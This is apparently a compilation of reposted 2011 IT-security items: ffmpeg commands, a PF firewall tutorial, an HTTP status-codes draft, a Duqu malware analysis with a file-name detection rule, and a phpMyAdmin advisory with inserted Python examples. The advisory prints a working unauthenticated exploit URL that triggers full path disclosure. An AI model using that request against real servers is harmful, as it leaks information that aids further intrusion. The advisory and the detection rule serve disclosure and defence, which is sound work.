Source video: source_video.avi
Audio bitrate: 192kb/s
Output format: mp3
Generated sound: sound.mp3

Convert a wav file to MP3

    ffmpeg -i son_origine.avi -vn -ar 44100 -ac 2 -ab 192 -f mp3 son_final.mp3

Convert .avi video to .mpg

    ffmpeg -i video_origine.avi video_finale.mpg

Convert .mpg to .avi

    ffmpeg -i video_origine.mpg video_finale.avi

Convert .avi to animated gif (uncompressed)
    ffmpeg -i video_origine.avi gif_anime.gif

Mix a video with a sound file

    ffmpeg -i son.wav -i video_origine.avi video_finale.mpg

Convert .avi to .flv

    ffmpeg -i video_origine.avi -ab 56 -ar 44100 -b 200 -r 15 -s 320x240 -f flv video_finale.flv

Convert .avi to dv

    ffmpeg -i video_origine.avi -s pal -r pal -aspect 4:3 -ar 48000 -ac 2 video_finale.dv

Or:

    ffmpeg -i video_origine.avi -target pal-dv video_finale.dv

Convert .avi to mpeg for DVD players

    ffmpeg -i source_video.avi -target pal-dvd -ps 2000000000 -aspect 16:9 finale_video.mpeg

Explanations:
target pal-dvd: output format
ps 2000000000: maximum size for the output file, in bits (here, 2 Gb)
aspect 16:9: widescreen

Compress .avi to divx

    ffmpeg -i video_origine.avi -s 320x240 -vcodec msmpeg4v2 video_finale.avi

Compress Ogg Theora to MPEG DVD

    ffmpeg -i film_sortie_cinelerra.ogm -s 720x576 -vcodec mpeg2video -acodec mp3 film_terminée.mpg

Compress .avi to SVCD mpeg2

NTSC format:

    ffmpeg -i video_origine.avi -target ntsc-svcd video_finale.mpg

PAL format:

    ffmpeg -i video_origine.avi -target pal-svcd video_finale.mpg

Compress .avi to VCD mpeg2

NTSC format:

    ffmpeg -i video_origine.avi -target ntsc-vcd video_finale.mpg

PAL format:

    ffmpeg -i video_origine.avi -target pal-vcd video_finale.mpg

Multi-pass encoding with ffmpeg

    ffmpeg -i fichierentree -pass 2 -passlogfile ffmpeg2pass fichiersortie-2

This article is an English adaptation of Jean Cartier's ffmpeg examples.

Sursa: http://www.catswhocode.com/blog/19-ffmpeg-commands-for-all-needs
20. Firewalling with OpenBSD's PF packet filter

Peter N. M. Hansteen <peter _@_ bsdly.net>
Copyright 2005 - 2011 Peter N. M. Hansteen

Table of Contents

Before we start
PF? Packet filter? Firewall? NAT?
PF today
BSD vs Linux - Configuration
Simplest possible setup (OpenBSD)
Simplest possible setup (FreeBSD)
Simplest possible setup (NetBSD)
First rule set - single machine
Slightly stricter
Statistics from pfctl
A simple gateway, NAT if you need it
Gateways and the pitfalls of in, out and on
What is your local network, anyway?
Setting up
That sad old FTP thing
If We Have To: ftp-proxy With Redirection
Historical FTP proxies: do not use
Ancient FTP through NAT: ftp-proxy
Ancient: FTP, PF and routable addresses: ftpsesame, pftpx and ftp-proxy!
ftp-proxy, slightly new style
Making your network troubleshooting friendly
Then, do we let it all through?
The easy way out: The buck stops here
Letting ping through
Helping traceroute
Path MTU discovery
Network hygiene: Blocking, scrubbing and so on
block-policy
scrub
antispoof
Handling non-routable addresses from elsewhere
A web server and a mail server on the inside
Taking care of your own - the inside
Tables make your life easier
Logging
Taking a peek with tcpdump
Other log tools you may want to look into
But there are limits (an anecdote)
Keeping an eye on things with systat
Keeping an eye on things with pftop
Invisible gateway - bridge
Directing traffic with ALTQ
ALTQ - prioritizing by traffic type
So why does this work?
Using a match Rule for Queue Assignment
ALTQ - allocation by percentage
ALTQ - handling unwanted traffic
CARP and pfsync
Wireless networks made simple
A little IEEE 802.11 background
WEP (Wired Equivalent Privacy)
WPA (WiFi Protected Access)
Setting up a simple wireless network
An open, yet tightly guarded wireless network with authpf
Turning away the brutes
expiring table entries with pfctl
Using expiretable to tidy your tables
Giving spammers a hard time
Remember, you are not alone: blacklisting
List of black and grey, and the sticky tarpit
Setting up spamd
Some early highlights of our spamd experience
Beating'em up some more: spamdb and greytrapping
Enter greytrapping
Your own traplist
Deleting, handling trapped entries
The downside: some people really do not get it
Conclusions from our spamd experience
PF - Haiku
References
Where to find the tutorial on the web
If you enjoyed this: Buy OpenBSD CDs and other items, donate!

Before we start

This lecture[1] will be about firewalls and related functions, starting from a little theory along with a number of examples of filtering and other network traffic directing. As in any number of other endeavors, the things I discuss can be done in more than one way.

More information: The Book of PF, training, consulting

Most of the topics we touch on here are covered in more detail in The Book of PF, which was written by the same author and published by No Starch Press at the end of 2007, with a revised and updated second edition published in November 2010. The book is an expanded and extensively rewritten followup to this tutorial, and covers a range of advanced topics in addition to those covered here. This tutorial is in minimal-maintenance mode, in that I'll occasionally make an effort to keep the information in it up to date, but it will not expand in scope. For more in-depth information or topics not covered here, check the book, the PF User Guide (also known as The PF FAQ) or the relevant man pages.
If you buy the book via The OpenBSD Bookstore, the OpenBSD project gets a slightly larger cut. If you need PF related consulting or training, please contact me for further details. You may want to read my Rent-a-geek writeup too.

Under any circumstances I will urge you to interrupt me when you need to. That is, if you will permit me to use what I learn from your comments later, either in revised versions of this lecture or in practice at a later time.

PF?

What, then, is PF? Let us start by looking briefly at the project's history to put things in their proper context.

OpenBSD's Packet Filter subsystem, which most people refer to simply by using the abbreviated form 'PF', was originally written in an effort of extremely rapid development during the northern hemisphere summer and autumn months of 2001 by Daniel Hartmeier and a number of OpenBSD developers, and was launched as a default part of the OpenBSD 3.0 base system in December of 2001.

The need for a new firewalling software subsystem for OpenBSD arose when Darren Reed announced to the world that IPFilter, which at that point had been rather intimately integrated in OpenBSD, was not after all BSD licensed. In fact quite to the contrary. The license itself was almost a word by word copy of the BSD license, omitting only the right to make changes to the code and distribute the result. The OpenBSD version of IPFilter contained quite a number of changes and customizations, which it turned out were not allowed according to the license.

IPFilter was removed from the OpenBSD source tree on May 29th, 2001, and for a few weeks OpenBSD-current did not contain any firewalling software.

Fortunately, in Switzerland Daniel Hartmeier was already doing some limited experiments involving kernel hacking in the networking code. His starting point was hooking a small function of his own into the networking stack, making packets pass through it, and after a while he had started thinking about filtering.
Then the license crisis happened. IPFilter was pruned from the source tree on May 29th. The first commit of the PF code happened Sunday, June 24 2001 at 19:48:58 UTC.[2]

A few months of rather intense activity followed, and the version of PF to be released with OpenBSD 3.0 contained a rather complete implementation of packet filtering, including network address translation.

From the looks of it, Daniel Hartmeier and the other PF developers made good use of their experience with the IPFilter code. Under any circumstances Daniel presented a USENIX 2002 paper with performance tests which show that the OpenBSD 3.1 PF performed as well as or better under stress than IPFilter on the same platform or iptables on Linux. In addition, some tests were run on the original PF from OpenBSD 3.0. These tests showed mainly that the code had gained in efficiency from version 3.0 to version 3.1. The article which provides the details is available from Daniel Hartmeier's web site, see http://www.benzedrine.cx/pf-paper.html.

I have not seen comparable tests performed recently, but in my own experience and that of others, the PF filtering overhead is pretty much negligible. As one data point, the machine which gateways between one of the networks where I've done a bit of work and the world is a Pentium III 450MHz with 384MB of RAM. When I've remembered to check, I've never seen the machine at less than 96 percent 'idle' according to top.

It is however worth noting that various optimisations have been introduced to OpenBSD's PF code during recent releases (mainly by the current main PF developers Henning Brauer and Ryan McBride with contributions from others), making each release from 4.4 through 4.9 perform better than its predecessors.

.................................................................

Online: http://home.nuug.no/~peter/pf/en/long-firewall.html
21. RTCA : Portable Windows forensic analysis tool

OCTOBER 20, 2011 13:13 PM - 0 COMMENTS by BLACK on OCTOBER 20, 2011

RTCA is a Windows forensic analysis tool, registry, audit logs and files. RTCA basically is a standalone and portable application for extraction and analysis investigation, can be used in local configuration report or analysis after extraction. As it analysis after extraction analysis is fast and accurate.

Features of RTCA

- Compatible with Windows XP, Vista, 2003, 2008, 7, 8 32-bit (64-bit version will be compiled) and 90% ok under Wine.
- Can be run in command line.
- Processing and copies of registry files (damaged registry too).
- System information: bootKeys/syskey, security features, serials MS…
- Applications, updates, list of services, drivers, and USB…
- UserAssist (command history performed by each user).
- Applications at startup.
- Network configuration, wireless and SSID.
- List of accounts, users and hash passwords.
- Passwords stored in the registry (eg VNC).
- Most Recent Used historical paths.
- Registry Viewer Lite.
- Processing of local logs file, evt (Windows= Vista) and log ( format linux / unix).
- file system extraction (file and directory) : acls, hidden and protected system state.
- Files explorer lite.
- Processes and associated network ports.
- Synthesis (audit logs, file and registry) sort by date.
- Export / Import results in CSV, HTML and XML.

Download: http://omnia-projetcs.googlecode.com/svn/trunk/RTCA/RtCA.exe

Source: http://www.pentestit.com/rtca-portable-windows-forensic-analysis-tool/
22. Internet-Draft - Additional HTTP Status Codes

Network Working Group                          M. Nottingham
Internet-Draft                                 Rackspace
Updates: 2616 (if approved)                    R. Fielding
Intended status: Standards Track               Adobe
Expires: April 20, 2012                        October 18, 2011

Additional HTTP Status Codes
draft-nottingham-http-new-status-02

Abstract

This document specifies additional HyperText Transfer Protocol (HTTP) status codes for a variety of common situations.

Status of this Memo

This Internet-Draft is submitted in full conformance with the provisions of BCP 78 and BCP 79.

Internet-Drafts are working documents of the Internet Engineering Task Force (IETF). Note that other groups may also distribute working documents as Internet-Drafts. The list of current Internet-Drafts is at http://datatracker.ietf.org/drafts/current/.

Internet-Drafts are draft documents valid for a maximum of six months and may be updated, replaced, or obsoleted by other documents at any time. It is inappropriate to use Internet-Drafts as reference material or to cite them other than as "work in progress."

This Internet-Draft will expire on April 20, 2012.

Copyright Notice

Copyright (c) 2011 IETF Trust and the persons identified as the document authors. All rights reserved.

This document is subject to BCP 78 and the IETF Trust's Legal Provisions Relating to IETF Documents (http://trustee.ietf.org/license-info) in effect on the date of publication of this document. Please review these documents carefully, as they describe your rights and restrictions with respect to this document. Code Components extracted from this document must include Simplified BSD License text as described in Section 4.e of the Trust Legal Provisions and are provided without warranty as described in the Simplified BSD License.

Nottingham & Fielding Expires April 20, 2012 [Page 1]

Internet-Draft Additional HTTP Status Codes October 2011

Table of Contents

1. Introduction
2. Requirements
3. 428 Precondition Required
4. 429 Too Many Requests
5. 431 Request Header Fields Too Large
6. 511 Network Authentication Required
7. Security Considerations
8. IANA Considerations
9. References
9.1. Normative References
9.2. Informative References
Appendix A. Acknowledgements
Appendix B. Issues Raised by Captive Portals
Authors' Addresses

1. Introduction

This document specifies additional HTTP [RFC2616] status codes for a variety of common situations, to improve interoperability and avoid confusion when other, less precise status codes are used.

Feedback should occur on the ietf-http-wg@w3.org mailing list, although this draft is NOT a work item of the IETF HTTPbis Working Group.

2. Requirements

The key words "MUST", "MUST NOT", "REQUIRED", "SHALL", "SHALL NOT", "SHOULD", "SHOULD NOT", "RECOMMENDED", "MAY", and "OPTIONAL" in this document are to be interpreted as described in [RFC2119].

3. 428 Precondition Required

This status code indicates that the origin server requires the request to be conditional.

Its typical use is to avoid the "lost update" problem, where a client GETs a resource's state, modifies it, and PUTs it back to the server, when meanwhile a third party has modified the state on the server, leading to a conflict. By requiring requests to be conditional, the server can assure that clients are working with the correct copies.

Responses using this status code SHOULD explain how to resubmit the request successfully. For example:

    HTTP/1.1 428 Precondition Required
    Content-Type: text/html

    <html>
      <head>
        <title>Precondition Required</title>
      </head>
      <body>
        <h1>Precondition Required</h1>
        <p>This request is required to be conditional; try using "If-Match".</p>
      </body>
    </html>

Responses with the 428 status code MUST NOT be stored by a cache.

4. 429 Too Many Requests

This status code indicates that the user has sent too many requests in a given amount of time ("rate limiting").

The response representations SHOULD include details explaining the condition, and MAY include a Retry-After header indicating how long to wait before making a new request.

For example:

    HTTP/1.1 429 Too Many Requests
    Content-Type: text/html
    Retry-After: 3600

    <html>
      <head>
        <title>Too Many Requests</title>
      </head>
      <body>
        <h1>Too many Requests</h1>
        <p>I only allow 50 requests per hour to this Web site per logged in user. Try again soon.</p>
      </body>
    </html>

Note that this specification does not define how the origin server identifies the user, nor how it counts requests. For example, an origin server that is limiting request rates can do so based upon counts of requests on a per-resource basis, across the entire server, or even among a set of servers. Likewise, it might identify the user by its authentication credentials, or a stateful cookie.

Responses with the 429 status code MUST NOT be stored by a cache.

5. 431 Request Header Fields Too Large

This status code indicates that the server is unwilling to process the request because its header fields are too large. The request MAY be resubmitted after reducing the size of the request header fields.

It can be used both when the set of request header fields in total are too large, and when a single header field is at fault. In the latter case, the response representation SHOULD specify which header field was too large.

For example:

    HTTP/1.1 431 Request Header Fields Too Large
    Content-Type: text/html

    <html>
      <head>
        <title>Request Header Fields Too Large</title>
      </head>
      <body>
        <h1>Request Header Fields Too Large</h1>
        <p>The "Example" header was too large.</p>
      </body>
    </html>

Responses with the 431 status code MUST NOT be stored by a cache.

6. 511 Network Authentication Required

This status code indicates that the client needs to authenticate to gain network access.

The response representation SHOULD indicate how to do this; e.g., with an HTML form for submitting credentials.

The 511 status SHOULD NOT be generated by origin servers; it is intended for use by intercepting proxies that are interposed as a means of controlling access to the network.

Responses with the 511 status code MUST NOT be stored by a cache.

6.1. The 511 Status Code and Captive Portals

A network operator wishing to require some authentication, acceptance of terms or other user interaction before granting access usually does so by identifying clients who have not done so ("unknown clients") using their MAC addresses.

Unknown clients then have all traffic blocked, except for that on TCP port 80, which is sent to a HTTP server (the "login server") dedicated to "logging in" unknown clients, and of course traffic to the login server itself.

For example, a user agent might connect to a network and make the following HTTP request on TCP port 80:

    GET /index.htm HTTP/1.1
    Host: www.example.com

Upon receiving such a request, the login server would generate a 511 response:

    HTTP/1.1 511 Network Authentication Required
    Refresh: 0; url=https://login.example.net/
    Content-Type: text/html

    <html>
      <head>
        <title>Network Authentication Required</title>
      </head>
      <body>
        <p>You need to <a href="https://login.example.net/">
        authenticate with the local network</a> in order to get access.</p>
      </body>
    </html>

Here, the 511 status code assures that non-browser clients will not interpret the response as being from the origin server, and the Refresh header redirects the user agent to the login server (an HTML META element can be used for this as well).

Note that the 511 response can itself contain the login interface, but it may not be desirable to do so, because browsers would show the login interface as being associated with the originally requested URL, which may cause confusion.

7. Security Considerations

7.1. 428 Precondition Required

The 428 status code is optional; clients cannot rely upon its use to prevent "lost update" conflicts.

7.2. 429 Too Many Requests

Servers are not required to use the 429 status code; when limiting resource usage, it may be more appropriate to just drop connections, or take other steps.

7.3. 431 Request Header Fields Too Large

Servers are not required to use the 431 status code; when under attack, it may be more appropriate to just drop connections, or take other steps.

7.4. 511 Network Authentication Required

In common use, a response carrying the 511 status code will not come from the origin server indicated in the request's URL. This presents many security issues; e.g., an attacking intermediary may be inserting cookies into the original domain's name space, may be observing cookies or HTTP authentication credentials sent from the user agent, and so on.

However, these risks are not unique to the 511 status code; in other words, a captive portal that is not using this status code introduces the same issues.

8. IANA Considerations

The HTTP Status Codes Registry should be updated with the following entries:

o Code: 428
o Description: Precondition Required
o Specification: [ this document ]

o Code: 429
o Description: Too Many Requests
o Specification: [ this document ]

o Code: 431
o Description: Request Header Fields Too Large
o Specification: [ this document ]

o Code: 511
o Description: Network Authentication Required
o Specification: [ this document ]

9. References

9.1. Normative References

[RFC2119] Bradner, S., "Key words for use in RFCs to Indicate Requirement Levels", BCP 14, RFC 2119, March 1997.

[RFC2616] Fielding, R., Gettys, J., Mogul, J., Frystyk, H., Masinter, L., Leach, P., and T. Berners-Lee, "Hypertext Transfer Protocol -- HTTP/1.1", RFC 2616, June 1999.

9.2. Informative References

[RFC4791] Daboo, C., Desruisseaux, B., and L. Dusseault, "Calendaring Extensions to WebDAV (CalDAV)", RFC 4791, March 2007.

[RFC4918] Dusseault, L., "HTTP Extensions for Web Distributed Authoring and Versioning (WebDAV)", RFC 4918, June 2007.

Appendix A. Acknowledgements

Thanks to Jan Algermissen for his suggestions and feedback. The authors take all responsibility for errors and omissions.

Appendix B. Issues Raised by Captive Portals

Since clients cannot differentiate between a portal's response and that of the HTTP server that they intended to communicate with, a number of issues arise.

One example is the "favicon.ico" <http://en.wikipedia.org/wiki/Favicon> commonly used by browsers to identify the site being accessed. If the favicon for a given site is fetched from a captive portal instead of the intended site (e.g., because the user is unauthenticated), it will often "stick" in the browser's cache (most implementations cache favicons aggressively) beyond the portal session, so that it seems as if the portal's favicon has "taken over" the legitimate site.

Another browser-based issue comes about when P3P <http://www.w3.org/TR/P3P/> is supported. Depending on how it is implemented, it's possible a browser might interpret a portal's response for the p3p.xml file as the server's, resulting in the privacy policy (or lack thereof) advertised by the portal being interpreted as applying to the intended site.

Other Web-based protocols such as WebFinger <http://code.google.com/p/webfinger/wiki/WebFingerProtocol>, CORS <http://www.w3.org/TR/cors/> and OAuth <http://tools.ietf.org/html/draft-ietf-oauth-v2> may also be vulnerable to such issues.

Although HTTP is most widely used with Web browsers, a growing number of non-browsing applications use it as a substrate protocol. For example, WebDAV [RFC4918] and CalDAV [RFC4791] both use HTTP as the basis (for network filesystem access and calendaring, respectively). Using these applications from behind a captive portal can result in spurious errors being presented to the user, and might result in content corruption, in extreme cases.

Similarly, other non-browser applications using HTTP can be affected as well; e.g., widgets <http://www.w3.org/TR/widgets/>, software updates, and other specialised software such as Twitter clients and the iTunes Music Store.

It should be noted that it's sometimes believed that using HTTP redirection to direct traffic to the portal addresses these issues. However, since many of these uses "follow" redirects, this is not a good solution.

Authors' Addresses

Mark Nottingham
Rackspace
Email: mnot@mnot.net
URI: http://www.mnot.net/

Roy T. Fielding
Adobe Systems Incorporated
345 Park Ave
San Jose, CA 95110
USA
Email: fielding@gbiv.com
URI: http://roy.gbiv.com/

Source: draft-nottingham-http-new-status-02 - Additional HTTP Status Codes
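The three origin-server status codes in the draft (428, 429, 431) each hinge on a decision the server makes before it processes the request. The block below is an added example written for this page, not code from the draft or from any real server: a single request handler that emits 428 when a PUT arrives without If-Match, 412 when the If-Match validator is stale, 429 with a computed Retry-After when a per-user sliding window is exhausted, and 431 when a header field (or the total) exceeds a size limit. The per-field and total header limits, the use of SHA-256 as the ETag validator, and the caller-supplied user identifier are assumptions; the draft deliberately leaves user identification and request counting to the server, and the 50-per-hour window only echoes the draft's own HTML example.

```python
"""Added example, constructed for this page: decision logic for the 428,
429 and 431 status codes of draft-nottingham-http-new-status.  Requests,
headers and resource state are plain Python values so it runs offline."""
import hashlib
import time
from collections import deque

MAX_HEADER_BYTES = 4096        # assumed limit for a single header field (431)
MAX_TOTAL_HEADER_BYTES = 8192  # assumed limit for all header fields together (431)
RATE_LIMIT = 50                # requests per window; mirrors the draft's example text
RATE_WINDOW = 3600             # seconds


def etag_for(body):
    """Strong validator for a representation: quoted hex SHA-256 of the body."""
    return '"' + hashlib.sha256(body.encode()).hexdigest() + '"'


class Resource:
    """A single server-side resource whose ETag changes whenever its body does."""
    def __init__(self, body):
        self.body = body

    @property
    def etag(self):
        return etag_for(self.body)


class RateLimiter:
    """Sliding-window counter keyed by an opaque user id supplied by the caller
    (the draft does not define how the user is identified)."""
    def __init__(self, limit=RATE_LIMIT, window=RATE_WINDOW):
        self.limit, self.window = limit, window
        self.hits = {}

    def check(self, user, now):
        """Return (allowed, retry_after_seconds)."""
        q = self.hits.setdefault(user, deque())
        while q and now - q[0] >= self.window:
            q.popleft()
        if len(q) >= self.limit:
            # Seconds until the oldest hit leaves the window, rounded up.
            return False, int(self.window - (now - q[0])) + 1
        q.append(now)
        return True, 0


def check_header_sizes(headers):
    """Return the offending field name, '' when only the total is too large,
    or None when the header block is acceptable."""
    total = 0
    for name, value in headers.items():
        size = len(name) + len(value)
        if size > MAX_HEADER_BYTES:
            return name
        total += size
    return "" if total > MAX_TOTAL_HEADER_BYTES else None


def handle(method, headers, body, user, resource, limiter, now=None):
    """Return (status, response_headers, response_body) for one request."""
    now = time.time() if now is None else now

    bad = check_header_sizes(headers)
    if bad is not None:
        # 431: name the field when a single one is at fault (draft, section 5).
        msg = (f'The "{bad}" header was too large.' if bad
               else "The request header fields are too large in total.")
        return 431, {"Cache-Control": "no-store"}, msg

    allowed, retry = limiter.check(user, now)
    if not allowed:
        # 429 with Retry-After; MUST NOT be cached (draft, section 4).
        return 429, {"Retry-After": str(retry), "Cache-Control": "no-store"}, \
            f"Only {limiter.limit} requests per {limiter.window} seconds are allowed."

    if method == "PUT":
        if "If-Match" not in headers:
            # 428: require the write to be conditional (draft, section 3).
            return 428, {"Cache-Control": "no-store"}, \
                'This request is required to be conditional; try using "If-Match".'
        if headers["If-Match"] != resource.etag:
            # Stale validator: the lost update the draft describes is refused.
            return 412, {}, "Precondition Failed"
        resource.body = body
        return 204, {"ETag": resource.etag}, ""

    return 200, {"ETag": resource.etag}, resource.body
```

The order of the checks matters: header size is tested before anything else because an over-large header block is the cheapest thing to reject, and the rate limiter runs before the conditional-request logic so that a client hammering the server with unconditional PUTs still gets counted.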
23. Phishing page hacked, turned into PSA on the dangers of phishing

THURSDAY, OCTOBER 20, 2011

Here's something you don't see very often. Someone - perhaps the recipient of the below phishing mail while having a Falling Down style day at the office - decided enough was enough and set out to hijack the phishing site they were sent to. This is the email that started it all:

"You have exceeded the storage limit on your mailbox. You will not be able to send or receive new mail until you upgrade your email. Click the below link and fill the form to upgrade your account. System Administrator"

Clicking the link would have taken you to the below phishing form that asks for Username, Password and Email address (along with password verification). Now? Well, it looks a little bit different: The original boxes are gone, replaced by the following message :

"There is no such thing as a central email service update a stupid criminal created this to steal your email account I have modified it to educate you about online crime he does not like that but that is too damn bad you can submit this form to see a helpful video about phishing stop letting stupid criminals like this one hijack your account have a great day"

Hitting the submit button takes you to a warning video about Phishing scams on CNET. There's no indication left as to how the person now in control of the site obtained the login credentials. Phishing the phisher, perhaps? It does happen from time to time...

Author: Christopher Boyd (Thanks to Robert and Wendy for this one)

Source: GFI LABS Blog: Phishing page hacked, turned into PSA on the dangers of phishing
24. The Day of the Golden Jackal - The Next Tale in the Stuxnet Files: Duqu

Tuesday, October 18, 2011 at 10:49am by Guilherme Venere and Peter Szor

Stuxnet was possibly the most complex attack of this decade, and we expected that similar attacks would appear in the near future. One thing for sure is that the Stuxnet team is still active–as recent evidence has revealed. McAfee Labs received a kit from an independent team of researchers that is closely related to the original Stuxnet worm, but with a different goal–to be used for espionage and targeted attacks against sites such as Certificate Authorities (CAs).

How do we know it was the Stuxnet team? To start with, the attacks are targeting CAs in regions occupied by “Canis Aureus,” the Golden Jackal, to execute professional targeted attacks, against sites such as CAs. The Stuxnet worm utilized two “stolen” digital certificates belonging to two companies from Taiwan that operated in the same business district. Yet, the Stuxnet-related code, named Duqu, which McAfee Labs received as part of an on-going investigation, was signed with yet another key belonging to the company C-Media Electronics, in Taipei. It is highly likely that this key, just like the previous two known cases, was not really stolen from the actual companies, but instead directly generated in the name of such companies at a CA as part of a direct attack.

The threat that we call Duqu is based on Stuxnet and is very similar. Only a few sites so far are known to have been attacked by the code, and it does not have PLC functionality like Stuxnet. Instead, the code, delivered via exploitation, installs drivers and encrypted DLLs that function very similarly to the original Stuxnet code. In fact, the new driver’s code used for the injection attack is very similar to Stuxnet, as are several encryption keys and techniques that were used in Stuxnet. Duqu is very time sensitive, and is controlled by an extended, encrypted configuration file.

It communicates with a command server in India. This IP address has since been blacklisted at the ISP and no longer functions. Yet it was specially crafted to execute sophisticated attacks against key targets and has remote control functionality to install new code on the target. These include keyloggers, which can monitor all actions on systems: running processes, window messages, and so on. Furthermore, the keylogger component also contains functionality to hide files with a user-mode rootkit.

The file names of the SYS drivers can be cmi4432.sys and jminet7.sys. They relate to two groups of files that have similar functionality. A third file implements the keylogging functions. McAfee detects the packages as PWS-Duqu, PWS-Duqu.dr, and PWS-Duqu!rootkit.

Both SYS files have almost the exact same code, with a few differences. The main difference is the fact that one of them is digitally signed with a certificate belonging to C-Media, while the other is not. Here is an example of the certificate that seemingly belongs to C-Media:

Since the discovery of this malware, the certificate above has been revoked by VeriSign as we can see in the image below:

Certificate revoked by VeriSign

The purpose of the SYS file seems to be only to decrypt and execute the primary payload DLL. Each SYS file works with a different set of files that in turn generate different DLLs. The graph below shows the connections found between the samples so far:

File relationships for PWS-Duqu

As we can see above, the method used by both SYS files is very similar. The PNF file is an encrypted DLL that is decrypted and injected into arbitrary system processes. This DLL in turn decrypts another DLL that contains the malicious code used to hide the presence of the malware in memory. Both groups above also contain another module, sortXXXX.nls (where XXXX can be any hexadecimal character), shown in red above. It seems to be responsible for the malware’s malicious activities, such as command and control communications.

The keylogger module works a little differently from the SYS files, but it also uses a module with the same name as the other components. This file is hidden using the same method as the other modules. Although the files are different, both rootkits work more or less in the same way. Another relationship among the keylogger and the other two modules is that each uses the same decryption key for the strings stored in its data section. The strings indicate these modules have the capability to disable security tools, targeting some specific antivirus products.

McAfee Labs advises Certificate Authorities to carefully verify if their systems might have been affected by this threat or any variations. As we publish this blog, McAfee Labs has also identified a likely variation of this attack at another site.

McAfee Labs would like to thank the independent team working on the investigation of this case and their contributions to our research.

Source: https://blogs.mcafee.com/mcafee-labs/the-day-of-the-golden-jackal-%E2%80%93-further-tales-of-the-stuxnet-files
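The post names two concrete file names (cmi4432.sys, jminet7.sys) and one file-name pattern (sortXXXX.nls with four hexadecimal characters) that an incident responder can sweep a disk image or file inventory for. The block below is an added triage rule written for this page, not McAfee's code: it turns those indicators into a case-insensitive matcher and runs it over a constructed file listing. The listing, the rule names and the decision to treat a name match as a lead rather than a verdict are assumptions; the post itself gives only the names and the pattern, and a name match alone does not confirm the sample (a renamed legitimate file or a renamed dropper defeat it either way).

```python
"""Added example, not McAfee's code: file-name triage for the Duqu
indicators named in the post above, run over a constructed listing."""
import ntpath
import re

# Driver names the post gives for the two SYS groups.
KNOWN_DRIVERS = {"cmi4432.sys", "jminet7.sys"}

# Companion module sortXXXX.nls, XXXX being hexadecimal (from the post).
# Legitimate Windows NLS tables such as sortdefault.nls do not match
# because they have no four-hex-digit suffix.
SORT_NLS = re.compile(r"^sort[0-9a-f]{4}\.nls$", re.IGNORECASE)

# Constructed listing: a mix of benign names and names that match the rule.
CONSTRUCTED_LISTING = [
    r"C:\Windows\System32\drivers\cmi4432.sys",
    r"C:\Windows\System32\drivers\ndis.sys",
    r"C:\Windows\System32\sortdefault.nls",
    r"C:\Windows\System32\sort1a2b.nls",
    r"C:\Windows\System32\sortz9z9.nls",
    r"C:\Windows\inf\oem7.pnf",
    r"C:\Users\alice\AppData\Local\Temp\JmiNet7.SYS",
]


def classify(path):
    """Return the rule a path's file name triggers, or None when it is clean.

    ntpath is used so Windows paths are split correctly on any host OS."""
    name = ntpath.basename(path).lower()
    if name in KNOWN_DRIVERS:
        return "known-driver-name"
    if SORT_NLS.match(name):
        return "sort-nls-pattern"
    # The .pnf payloads the post describes are not matched on extension
    # alone: Windows keeps many legitimate precompiled .pnf files under inf\.
    return None


def triage(listing):
    """Map each path that triggers a rule to the rule name, preserving order."""
    hits = {}
    for path in listing:
        reason = classify(path)
        if reason:
            hits[path] = reason
    return hits


if __name__ == "__main__":
    for path, reason in triage(CONSTRUCTED_LISTING).items():
        print(f"{reason:20} {path}")
```

Hits from this rule are leads to pivot on, as the post itself does: check the driver's signature against the revoked C-Media certificate, look for the accompanying .pnf and the decrypted DLL in process memory, and correlate with the PWS-Duqu detection names.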
25. phpMyAdmin 3.4.5 – Full path disclosure in phpmyadmin.css.php

phpMyAdmin 3.4.5 suffers of insufficient input validation of the parameter js_frame in phpmyadmin.css.php, exposing information that could be used in further attacks.

CVE Entry: CVE-2011-3646
CWE: CWE-20, CWE-200
PMASA ENTRY: PMASA-2011-15

=========
Description

The script returns an error message, containing the full path if the js_frame parameter is defined as an array.

=========
Exploit

No authentication needed to exploit this vulnerability.

http://example.com/path_to_phpmyadmin/phpmyadmin.css.php?js_frame[]=right

=========
Official fix

http://phpmyadmin.git.sourceforge.net/git/gitweb.cgi?p=phpmyadmin/phpmyadmin;a=commitdiff;h=d35cba980893aa6e6455fd6e6f14f3e3f1204c52

=========
Credits

Discovered by Mihail Ursu ( http://securitate.md/ ) on 12 Sep 2011.

=========
Disclosure Timeline

Reported to vendor on 12 Sep 2011.
Confirmation from vendor 21 Sep 2011.
Patch confirmation 4 Oct 2011.
Official fix and public disclosure 17 Oct 2011.

Source: http://seclists.org/fulldisclosure/2011/Oct/690

It can be very useful.
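The defect class in the advisory above (CWE-20 leading to CWE-200) comes from PHP's request-parameter rules: a query key written as `name[]` makes `$_GET['name']` an array, and code that assumes a string then fails in a way whose error text names the script's location. The block below is an added example written for this page, not phpMyAdmin's code or its fix: it emulates that parameter semantic in Python, shows a handler that leaks its own path on the array input, and beside it a hardened handler that checks type and value first and returns a generic error. The `js_frame` allowlist (`left`, `right`) and the handler names are assumptions; `right` is only the value that appears in the advisory's URL.

```python
"""Added example, not phpMyAdmin's code: PHP-style array parameters and a
leaky versus hardened handler for a type-confused query parameter."""
import os
from urllib.parse import parse_qsl

# Assumed allowlist for js_frame; "right" is the value in the advisory URL.
ALLOWED_FRAMES = {"left", "right"}


def php_style_params(query):
    """Parse a query string the way PHP populates $_GET: a key ending in
    '[]' collects its values into a list, any other key keeps the last value."""
    params = {}
    for key, value in parse_qsl(query, keep_blank_values=True):
        if key.endswith("[]"):
            params.setdefault(key[:-2], []).append(value)
        else:
            params[key] = value
    return params


def leaky_css_handler(query):
    """The defect class: the parameter is assumed to be a string, and the
    failure path reports the script's absolute path to the client."""
    frame = php_style_params(query).get("js_frame", "")
    try:
        stylesheet = "frame-" + frame + ".css"   # TypeError when frame is a list
    except TypeError as exc:
        # Mirrors an interpreter warning that names the file: full path disclosure.
        return 500, f"Error in {os.path.abspath(__file__)}: {exc}"
    return 200, stylesheet


def hardened_css_handler(query):
    """Validate type and value before use and never echo internals on failure.
    Rejecting anything outside the allowlist also closes the door on path
    fragments arriving through the same parameter."""
    frame = php_style_params(query).get("js_frame", "")
    if not isinstance(frame, str) or frame not in ALLOWED_FRAMES:
        return 400, "Invalid request"
    return 200, "frame-" + frame + ".css"


if __name__ == "__main__":
    for q in ("js_frame=right", "js_frame[]=right"):
        print(q, "->", leaky_css_handler(q), "|", hardened_css_handler(q))
```

A server-side log entry for the rejected request is the right place for the diagnostic detail; the client-facing body stays constant so nothing about the deployment path can be inferred from it.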